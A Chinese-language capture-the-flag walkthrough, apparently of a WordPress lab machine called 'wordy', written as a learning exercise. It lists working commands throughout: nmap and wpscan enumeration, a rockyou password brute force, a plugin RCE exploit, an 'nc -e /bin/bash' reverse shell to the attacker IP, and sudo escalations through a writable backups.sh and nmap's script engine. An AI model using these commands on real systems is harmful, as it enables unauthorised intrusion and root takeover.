攻击机192.168.223.128
靶机192.168.223.134
主机发现:nmap -sP 192.168.223.0/24

端口扫描 nmap -sV -p- -A 192.168.223.134

开启了22 80端口，80是apache 2.4.25
先进入web界面看一下
用ip进不去，应该被重定向到wordy.com
vim /etc/hosts 加上 192.168.223.134 wordy

又是一个WP CMS，用wpscan搜一下漏洞

wpscan --url http://wordy/  

并没有扫到什么东西。
界面看了一下也没有什么有用信息，扫一下目录dirsearch -u http://wordy/

好像只有登录有用

用户名用wpscan枚举一下

wpscan --url http://wordy -e u

有admin,sarah graham mark jens五个账户
保存到一个user字典
但是密码用什么字典呢，苦想了半天没找到线索，看了别人wp，原来题目描述的时候有个clue

提示要用rockyou.txt这个字典，用wpscan爆破一下

wpscan --url http://wordy -U user.txt -P /usr/share/wordlists/rockyou.txt

这个字典我没解压，解压一下

gzip -d rockyou.txt.gz

爆破时候我才注意到字典太大了，忘记提示里面有个操作

这样生成了一个简单点的字典
再爆破wpscan --url http://wordy -U user.txt -P passwords.txt

爆破出来一组密码
mark helpdesk01
登录后台发现
这个wp用了一个插件 activity monitor

搜一下这插件有没有漏洞

searchsploit activity monitor

用50110.py这个rce

拿到shell
这个不太稳定，我们再反弹到攻击机上
攻击机开个监听nc -lvvp 4567
目标及执行 nc -e /bin/bash 192.168.223.128 4567

然后再切换到交互shell

python -c 'import pty; pty.spawn("/bin/bash")'

mark里面有个txt文件

告诉了我们graham的密码GSo7isUM1D4

su到graham
看一下权限sudo -l

jens可以免密执行 backups.sh
看一眼backups.sh里面是什么

里面内容是对网站根目录打包
将/bin/bash写入backups.sh，然后用jens免密root执行backups.sh就能拿到root shell

echo “/bin/bash” >>/home/jens/backups.sh
sudo -u jens ./backups.sh

成功拿到jens的shell

看一下有没有免密root的文件

nmap可以免密root执行
nmap是可以执行脚本的，我们将shell写入脚本，nmap执行脚本的时候，我们就能拿到rootshell

echo 'os.execute("/bin/sh")' >> shell
sudo nmap --script=shell

拿到root权限

拿到flag。